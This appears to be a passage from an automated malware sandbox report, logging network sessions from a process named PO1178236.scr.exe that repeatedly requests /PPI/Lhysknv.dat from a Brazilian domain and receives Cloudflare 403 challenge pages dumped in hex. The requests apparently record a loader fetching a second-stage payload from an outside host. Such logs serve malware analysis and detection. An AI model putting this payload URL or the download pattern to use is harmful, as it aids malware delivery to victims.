3a 68 69 64 64 65 6e
        Data Ascii: -left border-solid border-0 border-t border-gray-300"> <p class="text-13"> <span class="cf-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <strong class="font-semibold">8ff2c26cfa31c481</strong></span> <span class="cf-footer-separator sm:hidden
        2025-01-09 07:36:59 UTC1000INData Raw: 6e 64 6f 77 2e 5f 63 66 5f 74 72 61 6e 73 6c 61 74 69 6f 6e 20 3d 20 7b 7d 3b 0a 20 20 0a 20 20 0a 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 66 66 32 63 32 36 63 66 61 33 31 63 34 38 31 27 2c 74 3a 27 4d 54 63 7a 4e 6a 51 77 4f 44 49 78 4f 53 34 77 4d 44 41 77 4d 44 41 3d 27 7d 3b 76 61 72
        Data Ascii: ndow._cf_translation = {}; </script><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8ff2c26cfa31c481',t:'MTczNjQwODIxOS4wMDAwMDA='};var
        2025-01-09 07:36:59 UTC5INData Raw: 30 0d 0a 0d 0a
        Data Ascii: 0


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        103192.168.2.949812188.114.96.34437668C:\Users\user\Desktop\PO1178236.scr.exe
        TimestampBytes transferredDirectionData
        2025-01-09 07:37:00 UTC66OUTGET /PPI/Lhysknv.dat HTTP/1.1
        Host: www.vascocorretora.com.br
        2025-01-09 07:37:00 UTC1013INHTTP/1.1 403 Forbidden
        Date: Thu, 09 Jan 2025 07:37:00 GMT
        Content-Type: text/html; charset=UTF-8
        Transfer-Encoding: chunked
        Connection: close
        Cache-Control: max-age=15
        Expires: Thu, 09 Jan 2025 07:37:15 GMT
        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LDPaAIT%2FIn3oRQh3TrSEF%2F3tbZhcrpcdYUekWYRl0q4aJWBiuApUzJvE64yfHOhGqqtDTZseNWZgz40%2F%2FEFK8vHKk8PSp6xd%2By1IHAtRDlQPSH4zEI8W97Jfl2%2BQPAOaAHjRiFYOmJoaIq%2BZ"}],"group":"cf-nel","max_age":604800}
        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
        expect-ct: max-age=86400, enforce
        referrer-policy: same-origin
        x-content-type-options: nosniff
        x-frame-options: SAMEORIGIN
        x-xss-protection: 1; mode=block
        Server: cloudflare
        CF-RAY: 8ff2c270f8000c8e-EWR
        alt-svc: h3=":443"; ma=86400
        server-timing: cfL4;desc="?proto=TCP&rtt=1473&min_rtt=1465&rtt_var=566&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2854&recv_bytes=704&delivery_rate=1907250&cwnd=181&unsent_bytes=0&cid=9dbc02070f7f3fbb&ts=147&x=0"
        2025-01-09 07:37:00 UTC356INData Raw: 31 35 35 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
        Data Ascii: 1555<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
        2025-01-09 07:37:00 UTC1369INData Raw: 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69
        Data Ascii: Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="wi
        2025-01-09 07:37:00 UTC1369INData Raw: 65 63 74 69 6f 6e 20 63 66 2d 68 69 67 68 6c 69 67 68 74 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 63 6f 6e 74 61 69 6e 65 72 20 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 66 75 6c 6c 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 6e 6f 2d 73 63 72 65 65 6e 73 68 6f 74 20 65 72 72 6f 72 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 3c 21 2d 2d
        Data Ascii: ection cf-highlight"> <div class="cf-wrapper"> <div class="cf-screenshot-container cf-screenshot-full"> <span class="cf-no-screenshot error"></span> </div> </div> </div>...
        2025-01-09 07:37:00 UTC1369INData Raw: 6d 3a 74 65 78 74 2d 6c 65 66 74 20 62 6f 72 64 65 72 2d 73 6f 6c 69 64 20 62 6f 72 64 65 72 2d 30 20 62 6f 72 64 65 72 2d 74 20 62 6f 72 64 65 72 2d 67 72 61 79 2d 33 30 30 22 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 31 33 22 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 43 6c 6f 75 64 66 6c 61 72 65 20 52 61 79 20 49 44 3a 20 3c 73 74 72 6f 6e 67 20 63 6c 61 73 73 3d 22 66 6f 6e 74 2d 73 65 6d 69 62 6f 6c 64 22 3e 38 66 66 32 63 32 37 30 66 38 30 30 30 63 38 65 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a
        Data Ascii: m:text-left border-solid border-0 border-t border-gray-300"> <p class="text-13"> <span class="cf-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <strong class="font-semibold">8ff2c270f8000c8e</strong></span> <span class="cf-footer-separator sm:
        2025-01-09 07:37:00 UTC1006INData Raw: 3e 0a 20 20 77 69 6e 64 6f 77 2e 5f 63 66 5f 74 72 61 6e 73 6c 61 74 69 6f 6e 20 3d 20 7b 7d 3b 0a 20 20 0a 20 20 0a 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 66 66 32 63 32 37 30 66 38 30 30 30 63 38 65 27 2c 74 3a 27 4d 54 63 7a 4e 6a 51 77 4f 44 49 79 4d 43 34 77 4d 44 41 77 4d 44 41 3d
        Data Ascii: > window._cf_translation = {}; </script><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8ff2c270f8000c8e',t:'MTczNjQwODIyMC4wMDAwMDA=
        2025-01-09 07:37:00 UTC5INData Raw: 30 0d 0a 0d 0a
        Data Ascii: 0


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        104192.168.2.949813188.114.96.34437668C:\Users\user\Desktop\PO1178236.scr.exe
        TimestampBytes transferredDirectionData
        2025-01-09 07:37:00 UTC66OUTGET /PPI/Lhysknv.dat HTTP/1.1
        Host: www.vascocorretora.com.br
        2025-01-09 07:37:00 UTC1009INHTTP/1.1 403 Forbidden
        Date: Thu, 09 Jan 2025 07:37:00 GMT
        Content-Type: text/html; charset=UTF-8
        Transfer-Encoding: chunked
        Connection: close
        Cache-Control: max-age=15
        Expires: Thu, 09 Jan 2025 07:37:15 GMT
        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ifbkviXeXeQbXr8vRDasfcPMLtOOUtum6L11Eo0OH82Tk%2BsS7f%2BKEt6a%2BMsJj2o0%2FZYpv481IoJP0bBhACbVLuxoN8JO1FtzBMMkN78yq3%2FbZq0rpO9uAzCXxU9wgkpm217hdw3PrEkGqc3g"}],"group":"cf-nel","max_age":604800}
        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
        expect-ct: max-age=86400, enforce
        referrer-policy: same-origin
        x-content-type-options: nosniff
        x-frame-options: SAMEORIGIN
        x-xss-protection: 1; mode=block
        Server: cloudflare
        CF-RAY: 8ff2c274bfee42e8-EWR
        alt-svc: h3=":443"; ma=86400
        server-timing: cfL4;desc="?proto=TCP&rtt=1739&min_rtt=1736&rtt_var=658&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2854&recv_bytes=704&delivery_rate=1653454&cwnd=250&unsent_bytes=0&cid=a2288553c6e2f226&ts=134&x=0"
        2025-01-09 07:37:00 UTC360INData Raw: 31 35 35 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
        Data Ascii: 1555<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
        2025-01-09 07:37:00 UTC1369INData Raw: 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d
        Data Ascii: udflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="width=
        2025-01-09 07:37:00 UTC1369INData Raw: 6f 6e 20 63 66 2d 68 69 67 68 6c 69 67 68 74 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 63 6f 6e 74 61 69 6e 65 72 20 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 66 75 6c 6c 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 6e 6f 2d 73 63 72 65 65 6e 73 68 6f 74 20 65 72 72 6f 72 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 3c 21 2d 2d 20 2f 2e 63
        Data Ascii: on cf-highlight"> <div class="cf-wrapper"> <div class="cf-screenshot-container cf-screenshot-full"> <span class="cf-no-screenshot error"></span> </div> </div> </div>... /.c
        2025-01-09 07:37:00 UTC1369INData Raw: 78 74 2d 6c 65 66 74 20 62 6f 72 64 65 72 2d 73 6f 6c 69 64 20 62 6f 72 64 65 72 2d 30 20 62 6f 72 64 65 72 2d 74 20 62 6f 72 64 65 72 2d 67 72 61 79 2d 33 30 30 22 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 31 33 22 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 43 6c 6f 75 64 66 6c 61 72 65 20 52 61 79 20 49 44 3a 20 3c 73 74 72 6f 6e 67 20 63 6c 61 73 73 3d 22 66 6f 6e 74 2d 73 65 6d 69 62 6f 6c 64 22 3e 38 66 66 32 63 32 37 34 62 66 65 65 34 32 65 38 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64
        Data Ascii: xt-left border-solid border-0 border-t border-gray-300"> <p class="text-13"> <span class="cf-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <strong class="font-semibold">8ff2c274bfee42e8</strong></span> <span class="cf-footer-separator sm:hidd
        2025-01-09 07:37:00 UTC1002INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 74 72 61 6e 73 6c 61 74 69 6f 6e 20 3d 20 7b 7d 3b 0a 20 20 0a 20 20 0a 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 66 66 32 63 32 37 34 62 66 65 65 34 32 65 38 27 2c 74 3a 27 4d 54 63 7a 4e 6a 51 77 4f 44 49 79 4d 43 34 77 4d 44 41 77 4d 44 41 3d 27 7d 3b 76
        Data Ascii: window._cf_translation = {}; </script><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8ff2c274bfee42e8',t:'MTczNjQwODIyMC4wMDAwMDA='};v
        2025-01-09 07:37:00 UTC5INData Raw: 30 0d 0a 0d 0a
        Data Ascii: 0


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        105192.168.2.949814188.114.96.34437668C:\Users\user\Desktop\PO1178236.scr.exe
        TimestampBytes transferredDirectionData
        2025-01-09 07:37:01 UTC66OUTGET /PPI/Lhysknv.dat HTTP/1.1
        Host: www.vascocorretora.com.br
        2025-01-09 07:37:01 UTC1021INHTTP/1.1 403 Forbidden
        Date: Thu, 09 Jan 2025 07:37:01 GMT
        Content-Type: text/html; charset=UTF-8
        Transfer-Encoding: chunked
        Connection: close
        Cache-Control: max-age=15
        Expires: Thu, 09 Jan 2025 07:37:16 GMT
        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HL%2BZRiuu%2Bmq3umDJ9FQNpRXvvxFrhlGTq0OB5V0WbxbJ%2FofNk9YcrtuSyPZUHzTrfp0%2Fx8tP05pKdenbJS%2BCM%2BC4U%2FX0wrX5k%2Fu5eaXwztS6%2FC%2BsOmGoGN6qsMtzOM%2Fn5HkcHkQuU5SU4lqZ"}],"group":"cf-nel","max_age":604800}
        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
        expect-ct: max-age=86400, enforce
        referrer-policy: same-origin
        x-content-type-options: nosniff
        x-frame-options: SAMEORIGIN
        x-xss-protection: 1; mode=block
        Server: cloudflare
        CF-RAY: 8ff2c27889ad7cac-EWR
        alt-svc: h3=":443"; ma=86400
        server-timing: cfL4;desc="?proto=TCP&rtt=1985&min_rtt=1966&rtt_var=751&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2854&recv_bytes=704&delivery_rate=1485249&cwnd=202&unsent_bytes=0&cid=c4496261ff2fcd38&ts=134&x=0"
        2025-01-09 07:37:01 UTC348INData Raw: 31 35 35 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
        Data Ascii: 1555<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
        2025-01-09 07:37:01 UTC1369INData Raw: 75 69 72 65 64 21 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e
        Data Ascii: uired! | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" con
        2025-01-09 07:37:01 UTC1369INData Raw: 73 73 3d 22 63 66 2d 73 65 63 74 69 6f 6e 20 63 66 2d 68 69 67 68 6c 69 67 68 74 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 63 6f 6e 74 61 69 6e 65 72 20 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 66 75 6c 6c 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 6e 6f 2d 73 63 72 65 65 6e 73 68 6f 74 20 65 72 72 6f 72 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 3c 2f
        Data Ascii: ss="cf-section cf-highlight"> <div class="cf-wrapper"> <div class="cf-screenshot-container cf-screenshot-full"> <span class="cf-no-screenshot error"></span> </div> </div> </
        2025-01-09 07:37:01 UTC1369INData Raw: 63 65 6e 74 65 72 20 73 6d 3a 74 65 78 74 2d 6c 65 66 74 20 62 6f 72 64 65 72 2d 73 6f 6c 69 64 20 62 6f 72 64 65 72 2d 30 20 62 6f 72 64 65 72 2d 74 20 62 6f 72 64 65 72 2d 67 72 61 79 2d 33 30 30 22 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 31 33 22 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 43 6c 6f 75 64 66 6c 61 72 65 20 52 61 79 20 49 44 3a 20 3c 73 74 72 6f 6e 67 20 63 6c 61 73 73 3d 22 66 6f 6e 74 2d 73 65 6d 69 62 6f 6c 64 22 3e 38 66 66 32 63 32 37 38 38 39 61 64 37 63 61 63 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72
        Data Ascii: center sm:text-left border-solid border-0 border-t border-gray-300"> <p class="text-13"> <span class="cf-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <strong class="font-semibold">8ff2c27889ad7cac</strong></span> <span class="cf-footer-separ
        2025-01-09 07:37:01 UTC1014INData Raw: 20 3c 73 63 72 69 70 74 3e 0a 20 20 77 69 6e 64 6f 77 2e 5f 63 66 5f 74 72 61 6e 73 6c 61 74 69 6f 6e 20 3d 20 7b 7d 3b 0a 20 20 0a 20 20 0a 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 66 66 32 63 32 37 38 38 39 61 64 37 63 61 63 27 2c 74 3a 27 4d 54 63 7a 4e 6a 51 77 4f 44 49 79 4d 53 34 77
        Data Ascii: <script> window._cf_translation = {}; </script><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8ff2c27889ad7cac',t:'MTczNjQwODIyMS4w
        2025-01-09 07:37:01 UTC5INData Raw: 30 0d 0a 0d 0a
        Data Ascii: 0


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        106192.168.2.949815188.114.96.34437668C:\Users\user\Desktop\PO1178236.scr.exe
        TimestampBytes transferredDirectionData
        2025-01-09 07:37:02 UTC66OUTGET /PPI/Lhysknv.dat HTTP/1.1
        Host: www.vascocorretora.com.br
        2025-01-09 07:37:02 UTC1007INHTTP/1.1 403 Forbidden
        Date: Thu, 09 Jan 2025 07:37:02 GMT
        Content-Type: text/html; charset=UTF-8
        Transfer-Encoding: chunked
        Connection: close
        Cache-Control: max-age=15
